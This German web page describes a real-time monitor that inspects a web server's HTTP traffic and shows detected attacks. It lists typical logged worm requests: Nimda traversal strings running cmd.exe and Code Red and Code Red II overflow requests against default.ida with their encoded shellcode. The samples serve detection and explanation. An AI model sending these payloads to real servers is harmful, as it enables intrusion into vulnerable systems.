Zurück
Zurück

Realtime Wurm- und Hacker Monitor

Guru's Heaven bietet Besuchern die seltene Möglichkeit, Angriffe auf einen Webserver mit zu erleben - in Echtzeit! :-)
Hierbei wird der HTTP Datenstrom auf bekannte und unbekannte Angriffsmuster hin untersucht und erkannte Angriffe im unteren Fenster dargestellt.

Die horizontale Trennlinie in der Mitte kann mit der linken Maustaste rauf oder runter geschoben werden - ganz nach Wunsch!


red ball Die Anzahl der erkannten Angriffe wurde enorm erweitert. Es werden weit über 200 verschiedene Angriffe erkannt. Wenige Einträge im Logfile sind als positives Zeichen zu werten, dass alt bekannte Sicherheitslücken endlich geschlossen wurden, durch die sich z. B. Code Red, Code Red II oder Nimda verbreiten.
red ball Um Missverständnissen vorzubeugen sei nochmals deutlich darauf hingewiesen: Es wird nur ein Teil aller Würmer dargestellt, denn viele Würmer greifen andere Ports an als Port 80 (diese Angriffe werden durch die Firewall geblockt) oder richten sich gegen andere IP Adressen.
red ball Das Logfile wird jeden Mittwoch 18:30h deutscher Zeit gelöscht. In den Stunden danach ist es daher meist leer.
red ball Die häufigsten Einträge und ihre Verursacher sind:
/scripts/root.exe?/c+dir
[...]
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Wurm
Nimda

GET /default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u
7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

Wurm
Code Red
GET /default.ida?XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Wurm
Code Red II
GET /x.ida?AAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
Wurm
Code Red II Variante



Gurudivide

Zurück Zurück zum Bereich Sicherheit

Fehlt das Logfile im unteren Frame ? Ein Klick hier löst das Problem !
Hier, gelangst Du zur Hauptseite von Guru's Heaven!